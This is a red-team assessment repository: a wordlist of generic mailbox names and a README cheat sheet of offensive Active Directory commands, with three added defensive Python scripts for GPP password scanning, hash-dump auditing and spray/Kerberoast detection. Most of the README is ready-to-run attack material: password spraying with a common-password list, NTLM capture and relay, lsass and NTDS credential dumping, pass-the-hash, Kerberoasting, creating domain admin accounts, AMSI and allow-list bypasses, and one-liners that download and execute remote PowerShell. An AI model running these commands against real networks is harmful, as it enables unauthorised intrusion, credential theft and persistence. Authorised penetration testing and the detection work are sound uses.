├── generic-accounts.txt
└── README.md

/generic-accounts.txt:
--------------------------------------------------------------------------------
account
accounting
ad
adm
admin
administrator
advertising
application
applications
billing
business
careers
company
complaints
consultation
contact
contactus
corp
corporate
customer.service
design
digital
director
example
finance
foi
global
help
helpdesk
hr
info
isales
it
jobs
mail
manager
marketing
media
orders
payroll
post
postmaster
pr
privacy
queries
query
recruitment
root
sale
sales
supervisor
supply
support
test
testing
trade
enquiries
safety
customer-service
reception
webmaster
ceo
memberservices
customer
general
trust
healthway
webadmin
human.resources
inquiries
ask
social
office
head
headteacher
enquiry
email
accounts
sydney
enquires
mailbox
law
service
reservations
information
schooladmin
secretary
enq
advice
studio
bristol
headoffice
bookings
property
clerks
bursar
recruit
manchester
enquries
postbox
editor
enquire
all
insurance
md
hq
schooloffice
services
birmingham
print
hire
headmaster
architects
admissions
events
solicitors
lawyers
au
training
lettings
info.au
adminoffice
production
contracts
news
solutions
partners
hello
school
team
accountants
consult
operations
holidays
hotel
editorial
commercial
action
group
customer.services
insure
melbourne
care
shop
travel
feedback
ausales
legal
PRINCIPAL
engineers
traffic
mailroom
registrar
parts
ops
stay
sales.au
glasgow
administration
conferences
clerk
central
personnel
aberdeen
hostmaster
liverpool
exeter
properties
auinfo
purchasing
agency
architect
bradford
conference
projects
salesau
main
oxford
systems
management
leicester
art
ideas
me
welcome
furniture
postroom
enqs
press
chambers
quality
export
connect
inquires
hull
dundee
inbox
plymouth
people
croydon
europe
online
midlands
staff
books
coventry
construction
e-mail
info-au
graphics
theteam
library
invest
newcastle
technical
townclerk
kontakt
bicester
abingdon
commerciale
amministrazione
comercial
auctions
auction
web
technik
trading
infos
occasion
helpline
chairman
surveying
planning
home
informatique
master
club
shipping
used
treasurer
security
sport
architecture
reservation
development
president
hiredesk
repairs
franchise
boss
technique
freight
Equipment
membership
estate
hospitality
infodesk
general.enquiries
server
member
au-info
bury
institute
analysis
INFORMATICA
vets
users
generalenquiries
schoolmail
admin.office
learning
producer
farmer
officeadmin
education
schoolinfo
contact.us
school.office
mainoffice
academy
frontdesk
euroinfo
procurement
salesinfo
assistant
theoffice
genoffice
webmail
main.office
gen.enquiries
sms
documents
cio
hrtemp
servicedesk
itservicedesk
darwin
adelaide
bendigo
ballarat
calendar
sas
demo
ohs
whs
announcement
meetingroom1
meetingroom
itadmin
crm
crmsupport
referral
leave
testuser
testuser1
socialclub
socialevents
noreply
no-reply
voicemail
animal.ethics
aqis
counselling
domesticadmissions
edadvisor
medicalservice
safety
srtc
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# Red-Team and Infrastructure Assessments

### External recon

https://github.com/dcsync/recontools

### O365 bruting

`python3 office365userenum.py -u test.txt -v -o output.txt --password 'Password1'`

Enumeration (opsec safe):

`python o365creeper.py -f test.txt`

https://github.com/0xZDH/o365spray

### subdomain finder

https://spyse.com/

### Cert search

https://crt.sh

`%.blah.com`

### search categorized expired domain

`python3 ./domainhunter.py -r 1000`

### Metadata

`PS C:\> Invoke-PowerMeta -TargetDomain targetdomain.com`

## Domain User Enumeration

### MailSniper

#### Usernameharvest

`Invoke-UsernameHarvestOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Threads 1 -OutFile owa-valid-users.txt`

#### Domainnameharvest

`Invoke-DomainHarvestOWA -ExchHostname mail.domain.com`

#### OWA Spray
`Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Fall2016 -Threads 15 -OutFile owa-sprayed-creds.txt`

### Grab employee names from Linkedin

`theharvester -d blah.com -l 1000 -b linkedin`

https://github.com/m8r0wn/CrossLinked

### Extract Linkedin details from snov.io

Regex to extract emails:

`grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b"`

### Extract from burp

`cat linkedin.txt | tr , '\n' | sed 's/\"//g' | awk '/"title":{"textDirection":"FIRST_STRONG"/{getline; print}'`

### Change format to b.lah

`awk '$1=FS tolower(substr($1,1,1)$NF)' linkedin-user-list.txt | awk '{ print $1 }'`

`awk '{print $0,tolower(substr($1,1,1)$NF)}' names.txt`

### Check usernames against AD:

Handy if you have generated a list from linkedin or a list of usernames.

`nmap -p 88 1.1.1.1 --script krb5-enum-users --script-args krb5-enum-users.realm="DOMAIN"`

The username list used by the script is located at `/usr/local/share/nmap/nselib/data/usernames.lst` in Kali.

### Null sessions

Still works on infra that was upgraded from 2k, 2k3.

`net use \\IP_ADDRESS\ipc$ "" /user:""`

Use enum4linux, enum or Dumpsec following the null session setup.
### GPP

https://bitbucket.org/grimhacker/gpppfinder/src/master/

`findstr /S /I cpassword \\DOMAINCONTROLLER\sysvol\DOMAIN\policies\*.xml`

## situational awareness

https://github.com/dafthack/HostRecon

Privesc checks:

https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation

## Network Attacks

### Responder

Grab NetNTLM hashes off the network.

#### Without wpad:

`responder -I eth0`

#### With wpad:

`responder -I eth0 --wpad -b -f -F`

#### Filter logs from logs folder and remove machine accounts:

`sort -m *.txt | uniq -d | awk '!/\$/'`

#### Cracking with John:

`john SMB-NTLMv2-Client-172.20.22.217.txt --wordlist=/root/passwords.txt`

Use hashcat on a more powerful box. This is only for easy wins.

#### NTLM Relaying

`ntlmrelayx.py -tf targets.txt -c `

### MITM6

`python mitm6.py -d blah.local`

#### Capture hashes

`impacket-smbserver hiya /tmp/ -smb2support`

## Bruteforce domain passwords

### Common Passwords

$Company1
$Season$Year
Password1
Password!
Welcome1
Welcome!
Welcome@123
P@55word
P@55w0rd
$month$year

### Using hydra

`hydra -L users.txt -p Password1 -m 'D' 172.20.11.55 smbnt -V`

### Bruteforce using net use

`@FOR /F %n in (users.txt) DO @FOR /F %p in (pass.txt) DO @net use \\DOMAINCONTROLLER\IPC$ /user:DOMAIN\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\DOMAINCONTROLLER\IPC$ > NUL`

### all systems

`net view /domain > systems.txt`

### Local admin search using net use

`@FOR /F %s in (systems.txt) DO @net use \\%s\C$ /user:domain\username Password 1>NUL 2>&1 && @echo %s>>admin_access.txt && @net use /delete \\%s\C$ > NUL`

### Domain joined machine

`Invoke-DomainPasswordSpray -Password Spring2017`

## Non-domain joined testing

When you have an initial set of compromised creds, run these from a virtual machine to place a foothold on the network as a domain user.

### Shell with domain user privileges

`C:\> runas.exe /netonly /user:BLAHDOMAIN\blahuser cmd.exe`

`runas /netonly /user:blah@blah.com "mmc %SystemRoot%\system32\dsa.msc"`

Make sure you use the FQDN of the domain and set the reg key as below.

### check dc:

`nltest /dsgetdc:domain.local`

To change the DC via the registry to point at the domain being tested:

`HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters`

`"SiteName" > DC1.domain.com`

### Create session for use with dumpsec

`net use \\10.0.0.1\ipc$ /user:domain.local\username password`

### Quick User lists and password policy enum

`net users /domain`

`net group /domain "Domain Admins"`

`net accounts /domain`

Note that the above commands do not work with runas. The PowerView functions below will work with runas.
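Back to the GPP section above: the `findstr` one-liner only tells you a `cpassword` attribute exists somewhere. This added example (not part of the repo) is a small SYSVOL scanner a defender can run to list every affected policy file with the account it sets and the policy's last-changed date, so the preference can be removed or rebuilt; the directory layout and XML bodies are constructed sample data, and nothing is decrypted.

```python
"""Scan a SYSVOL-style tree for Group Policy Preference XML files that still
carry a cpassword attribute. Added example, not from the original repo."""
import os
import tempfile
import xml.etree.ElementTree as ET

# Constructed sample SYSVOL tree: two Groups.xml (one with cpassword, one
# without) and a Services.xml, which names its account with accountName.
SAMPLE_SYSVOL = {
    "Policies/{11111111-1111-1111-1111-111111111111}/Machine/Preferences/Groups/Groups.xml":
        '<Groups><User name="LocalAdmin" changed="2016-03-01 10:00:00">'
        '<Properties action="U" userName="LocalAdmin" cpassword="CONSTRUCTED-BLOB"/>'
        '</User></Groups>',
    "Policies/{11111111-1111-1111-1111-111111111111}/Machine/Preferences/Services/Services.xml":
        '<NTServices><NTService name="BackupAgent" changed="2017-05-20 14:05:00">'
        '<Properties accountName="svc_backup" cpassword="CONSTRUCTED-BLOB-2"/>'
        '</NTService></NTServices>',
    "Policies/{22222222-2222-2222-2222-222222222222}/Machine/Preferences/Groups/Groups.xml":
        '<Groups><User name="Helpdesk" changed="2019-07-12 08:30:00">'
        '<Properties action="U" userName="Helpdesk"/></User></Groups>',
}


def find_cpasswords(root_dir):
    """Walk root_dir and return one finding per element with a cpassword
    attribute: file path, the account it sets, the policy's changed date and
    whether the blob is empty (an empty value is already harmless)."""
    findings = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for fname in files:
            if not fname.lower().endswith(".xml"):
                continue
            path = os.path.join(dirpath, fname)
            try:
                root = ET.parse(path).getroot()
            except ET.ParseError:
                continue  # unparsable XML: report separately in a real run
            # cpassword sits on <Properties>; name/changed sit on its parent.
            for parent in root.iter():
                for child in parent:
                    blob = next((v for k, v in child.attrib.items()
                                 if k.lower() == "cpassword"), None)
                    if blob is None:
                        continue
                    findings.append({
                        "file": os.path.relpath(path, root_dir).replace(os.sep, "/"),
                        "account": child.attrib.get("userName")
                                   or child.attrib.get("accountName")
                                   or parent.attrib.get("name", "?"),
                        "changed": parent.attrib.get("changed", "?"),
                        "empty": blob == "",
                    })
    return sorted(findings, key=lambda f: (f["file"], f["account"]))


def scan_sample():
    """Write the constructed tree to a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        for rel, body in SAMPLE_SYSVOL.items():
            full = os.path.join(tmp, *rel.split("/"))
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w", encoding="utf-8") as fh:
                fh.write(body)
        return find_cpasswords(tmp)


if __name__ == "__main__":
    for f in scan_sample():
        print(f"{f['file']}: account={f['account']} changed={f['changed']} empty={f['empty']}")
```

Point `find_cpasswords` at a mounted copy of `\\DC\sysvol\DOMAIN\Policies` to run it for real; any file it lists should be treated as a credential exposure regardless of how old the `changed` date is.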
### Powerview:

`. .\PowerView.ps1`

`Get-UserProperty -Properties samaccountname`

`Get-NetGroupMember`

`Get-DomainPolicy`

Search shares and files using Invoke-FileFinder and Invoke-ShareFinder.

## Domain Analysis

### BloodHound

Run locally on a non-domain joined machine (remember to add the target domain to the registry):

`. .\BloodHound.ps1`

`Invoke-BloodHound`

### SharpHound

`SharpHound.exe --CollectionMethod All`

### Run from remote shell

Useful when you have a remote shell.

`powershell Set-ExecutionPolicy RemoteSigned`

`powershell -command "& { . C:\BloodHound.ps1; Invoke-BloodHound }"`

### Run from web server or over Internet:

Use this when you cannot copy BloodHound.ps1 over to the target.

`powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/PowerShell/BloodHound.ps1'); Invoke-BloodHound"`

### Run using Sharppick - AMSI bypass

`SharpPick.exe -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1'); Invoke-BloodHound"`

`SharpPick-64.exe -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1'); Invoke-AllChecks"`

### Goddi (fast dump all domain info)

`.\godditest-windows-amd64.exe -username=testuser -password="testpass!" -domain="test.local" -dc="dc.test.local" -unsafe`

### ADRecon (More detailed - Good for AD Auditing)

https://github.com/sense-of-security/ADRecon

### Share and file finder

`Invoke-ShareFinder -CheckShareAccess -Verbose -Threads 20 | Out-File -Encoding Ascii interesting-shares.txt`

`Invoke-FileFinder -ShareList .\interesting-shares.txt -Verbose -Threads 20 -OutFile juicy_files.csv`

### Eyewitness

`docker run --rm -it -v /tmp/blah:/tmp/EyeWitness eyewitness --web --single https://www.google.com`

### Windows priv esc

https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/

## Compromise and Lateral Movement

### Crackmapexec

`crackmapexec smb 172.16.110.0/24`

`crackmapexec smb 172.16.110.154 -u Administrator -p Password1 -x 'ipconfig'`

`crackmapexec smb 172.16.110.154 -u Administrator -p Password1 --pass-pol`

`crackmapexec smb 172.16.110.154 -u Administrator -p Password1 -M mimikatz`

`crackmapexec smb 172.16.110.154 -u Administrator -p Password1 --sam`

`crackmapexec smb 172.16.110.154 -u Administrator -p Password1 --lsa`

### Winexe to boxes (not opsec safe) - service is run. No cleanup.

`pth-winexe //10.0.0.1 -U DOMAINBLAH/blahuser%blahpassword cmd`

`pth-winexe //10.0.0.1 -U DOMAINBLAH/blahuser%hash cmd`

### Impacket psexec.py to boxes (not opsec safe) - does cleanup after but leaves logs after installing and running service.
`psexec.py user@IP`

`psexec.py user@IP -hashes ntlm:hash`

### Impacket wmiexec.py (opsec safe - unless WMI logging is enabled)

`wmiexec.py domain/user@IP`

`wmiexec.py domain/user@IP -hashes ntlm:hash`

### Impacket smbclient (probably opsec safe as it's just using SMB)

`python smbclient.py domain/blahuser@10.0.0.1 -hashes aad3b435b51404eeaad3b435b51404ee:blah`

## RDP Pass the Hash

Using mimikatz:

`privilege::debug`

`sekurlsa::pth /user: /domain: /ntlm: /run:"mstsc.exe /restrictedadmin"`

If Restricted Admin mode is disabled:

`sekurlsa::pth /user: /domain: /ntlm: /run:powershell.exe`

`Enter-PSSession -Computer `

`New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force`

## Invoke the hash

`Invoke-WMIExec -Target blah -Username blah -Hash NTLMHASH -Command blah`

## Password dumping

### From Live Kali on a workstation

`samdump2 SYSTEM SAM > hashes.txt`

### Local

`C:\> reg.exe save hklm\sam c:\temp\sam.save`

`C:\> reg.exe save hklm\security c:\temp\security.save`

`C:\> reg.exe save hklm\system c:\temp\system.save`

`secretsdump.py -sam sam.save -security security.save -system system.save LOCAL`

`pwdump system sam`

### In Memory

`C:\> procdump.exe -accepteula -ma lsass.exe c:\lsass.dmp 2>&1`

`C:\> mimikatz.exe log "sekurlsa::minidump lsass.dmp" sekurlsa::logonPasswords exit`

`C:\> mini.exe`

https://github.com/b4rtik/ATPMiniDump

### From box

`mimikatz # privilege::debug`

`mimikatz # sekurlsa::logonPasswords full`

### Remote

`impacket-secretsdump Administrator@ip`

`impacket-secretsdump Administrator@ip -hashes ntlm:hash`
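The secretsdump commands in this section all emit `user:rid:lmhash:nthash:::` lines. This added example (not from the repo) parses that format and audits an authorised dump the way a defender would, without cracking anything: it drops machine accounts, then flags accounts still storing an LM hash, accounts with an empty password, and groups of accounts sharing one NT hash (password reuse); the dump below is constructed and every hash in it is a placeholder.

```python
"""Parse secretsdump-style hash lines and summarise weaknesses.
Added example, not from the original repo."""
import re
from collections import defaultdict

# Well-known hashes of the empty string; the LM one appears in this README.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

LINE_RE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:\\]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$", re.IGNORECASE)

# Constructed sample dump: the NT/LM values are fake 32-hex placeholders.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
blah.local\\alice:1104:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::
blah.local\\bob:1105:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::
blah.local\\legacy.user:1106:33333333333333333333333333333333:44444444444444444444444444444444:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:55555555555555555555555555555555:::
[*] Cleaning up...
"""


def parse_dump(text):
    """Return one dict per well-formed hash line; status lines are ignored."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            rows.append({k: (v.lower() if k in ("lm", "nt") else v)
                         for k, v in m.groupdict().items()})
    return rows


def audit(rows):
    """Summarise weaknesses across user accounts (machine accounts end in $)."""
    users = [r for r in rows if not r["user"].endswith("$")]
    by_nt = defaultdict(list)
    for r in users:
        by_nt[r["nt"]].append(r["user"])
    return {
        "accounts": len(users),
        "machine_dropped": len(rows) - len(users),
        # LM hashes stored at all means LM storage is still enabled somewhere.
        "lm_present": sorted(r["user"] for r in users if r["lm"] != EMPTY_LM),
        "blank_password": sorted(r["user"] for r in users if r["nt"] == EMPTY_NT),
        # Identical NT hashes mean identical passwords: reuse across accounts.
        "shared_nt": {h: sorted(u) for h, u in by_nt.items() if len(u) > 1},
    }


if __name__ == "__main__":
    report = audit(parse_dump(SAMPLE_DUMP))
    for key, value in report.items():
        print(f"{key}: {value}")
```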
### Domain

To find where NTDS is, run the below:

`reg.exe query hklm\system\currentcontrolset\services\ntds\parameters`

### vssadmin

`C:\> vssadmin list shadows`

`C:\> vssadmin create shadow /for=C:`

`copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit .`

`copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM .`

`copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM .`

`secretsdump.py -system system.save -ntds ntds.dit local -just-dc-ntlm`

Remove machine accounts:

`grep -a -F ':::' hashes.txt | grep -av '$:' > finalhashes.txt`

Only passwords, for pipal:

`cut -f 3 -d ':' cracked_with_users_enabled.txt`

`vssadmin delete shadows /shadow={cd534584-a272-44ab-81e1-ab3f5fbe9b29}`

Use godumpsecrets for a faster dump.

### ntdsutil

```
C:\>ntdsutil
ntdsutil: activate instance ntds
ntdsutil: ifm
ifm: create full c:\pentest
ifm: quit
ntdsutil: quit
```

`ntdsutil`

`ntdsutil: snapshot`

`ntdsutil: list all`

`ntdsutil: create`

`snapshot: mount 1`

Cleanup snapshots:

`snapshot: list all`

`snapshot: unmount 1`

`snapshot: list all`

`snapshot: delete 1`

## Post Compromise (Not opsec safe)

Add user to local admin and domain admin.

### Add Domain Admin

`net user username password /ADD /DOMAIN`

`net group "Domain Admins" username /ADD /DOMAIN`

### Add Local Admin

`net user username password /ADD`

`net localgroup Administrators username /ADD`

### Tasklist scraper to find logged in admins

If powershell is not enabled or you are unable to run BloodHound, this script will
find admins.

```
#!/bin/sh
for ip in $(cat ip.txt); do
    pth-winexe -U Admin%hash //$ip "ipconfig"
    pth-winexe -U Admin%hash //$ip "tasklist /v"
done
```

### Kerberoasting

`Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat`

https://raw.githubusercontent.com/xan7r/kerberoast/master/autokerberoast.ps1

`Invoke-AutoKerberoast`

`python autoKirbi2hashcat.py ticketfilefromautoinvokekerberoast`

`IEX (New-Object Net.WebClient).DownloadString('https://github.com/EmpireProject/Empire/raw/master/data/module_source/credentials/Invoke-Kerberoast.ps1'); Invoke-Kerberoast`

### Hashcat Alienware - kerbtgt hash cracking

`sudo apt-get install nvidia-367`

`sudo nvidia-smi`

`reboot`

`sudo hashcat -I`

`hashcat -m 13100 kerb.txt ~/Downloads/realuniq.lst`

### LAPS - GetLAPSPasswords

https://github.com/kfosaaen/Get-LAPSPasswords/blob/master/Get-LAPSPasswords.ps1

## Priv Esc

### Powerup

`IEX (New-Object Net.WebClient).DownloadString('https://github.com/PowerShellEmpire/PowerTools/raw/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks`

## File Transfer

### SMB Server in Kali

`python smbserver.py test /root/tools`

### Python Web Server

`python -m SimpleHTTPServer`

## Domain Fronting

https://blog.cobaltstrike.com/2017/02/06/high-reputation-redirectors-and-domain-fronting/

https://signal.org/blog/doodles-stickers-censorship/

https://www.securityartwork.es/2017/01/24/camouflage-at-encryption-layer-domain-fronting/

https://trac.torproject.org/projects/tor/wiki/doc/meek

http://bryceboe.com/2012/03/12/bypassing-gogos-inflight-internet-authentication/

## AWL bypasses

### Powershell without powershell.exe
`SharpPick.exe -d "http://blah/blah.ps1"`

### Squiblytwo

`wmic.exe os get /format:"http://blah/foo.xsl"`

### Sharpshooter

https://www.mdsec.co.uk/2018/03/payload-generation-using-sharpshooter/

`python SharpShooter.py --stageless --dotnetver 2 --payload js --output foo --rawscfile ./output/payload.bin --smuggle --template mcafee --com xslremote --awlurl http://blah/foo.xsl`

### cypher queries

User to which boxes the user has local admin:

`MATCH (u:User)-[r:MemberOf|:AdminTo*1..]->(c:Computer) return u.name, collect(c.name)`

List of DAs:

`Match p=(u:User)-[:MemberOf]->(g:Group) WHERE g.name= "DOMAIN ADMINS@BLAH.COM" return u.displayname`

--------------------------------------------------------------------------------
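The two loudest techniques in this README, password spraying (the hydra, `net use` loop, OWA spray and Invoke-DomainPasswordSpray sections) and Kerberoasting, leave a distinctive footprint in the domain controller's Security log, and this added example (not from the repo) shows the detection side: one source failing logons (event 4625) for many distinct accounts in a short window, and one account requesting RC4 (0x17) service tickets (event 4769) for many distinct user-owned service accounts. The event records are constructed samples, and the field names are simplified from the real event XML.

```python
"""Sliding-window detections for password spraying (4625) and Kerberoasting
(4769) over constructed sample events. Added example, not from the repo."""
from collections import defaultdict
from datetime import datetime, timedelta

BASE = datetime(2024, 1, 10, 9, 0, 0)


def _at(secs):
    return (BASE + timedelta(seconds=secs)).isoformat()


# Constructed samples: a spray from 10.0.0.50, two typos by carol, a
# Kerberoast by mallory, and ordinary AES (0x12) and computer-account traffic.
EVENTS = [{"id": 4625, "time": _at(i * 7), "user": f"user{i:02d}", "src": "10.0.0.50"}
          for i in range(12)]
EVENTS += [{"id": 4625, "time": _at(30 + i), "user": "carol", "src": "10.0.0.77"}
           for i in range(2)]
EVENTS += [{"id": 4769, "time": _at(100 + i * 3), "user": "mallory", "service": svc, "etype": "0x17"}
           for i, svc in enumerate(["svc_sql", "svc_web", "svc_backup", "svc_sccm", "svc_sp", "svc_ex"])]
EVENTS += [{"id": 4769, "time": _at(120), "user": "dave", "service": "svc_web", "etype": "0x12"},
           {"id": 4769, "time": _at(121), "user": "dave", "service": "FILE01$", "etype": "0x17"}]


def burst(events, key, value, window, threshold):
    """Return {key: distinct values} for every key that has at least
    `threshold` distinct `value`s inside some `window`-second span."""
    groups = defaultdict(list)
    for e in events:
        groups[e[key]].append((datetime.fromisoformat(e["time"]), e[value]))
    hits = {}
    for k, items in groups.items():
        items.sort()
        lo = 0
        for hi in range(len(items)):
            while items[hi][0] - items[lo][0] > timedelta(seconds=window):
                lo += 1  # slide the window start forward
            distinct = {v for _, v in items[lo:hi + 1]}
            if len(distinct) >= threshold:
                hits[k] = sorted(distinct)
                break
    return hits


def detect_password_spray(events, window=300, threshold=10):
    """Source addresses with failed logons for many distinct accounts."""
    return burst([e for e in events if e["id"] == 4625], "src", "user", window, threshold)


def detect_kerberoast(events, window=300, threshold=5):
    """Accounts pulling RC4 tickets for many distinct user-owned services.
    Computer-account services (name ends in $) are normal and are ignored."""
    rc4 = [e for e in events if e["id"] == 4769 and e["etype"].lower() == "0x17"
           and not e["service"].endswith("$")]
    return burst(rc4, "user", "service", window, threshold)


if __name__ == "__main__":
    print("spray:", detect_password_spray(EVENTS))
    print("kerberoast:", detect_kerberoast(EVENTS))
```

Thresholds are assumptions to tune per environment; a spray run through a proxy or VPN pool will spread across source addresses, so keying 4625 on the workstation name or the target DC as well is worth adding.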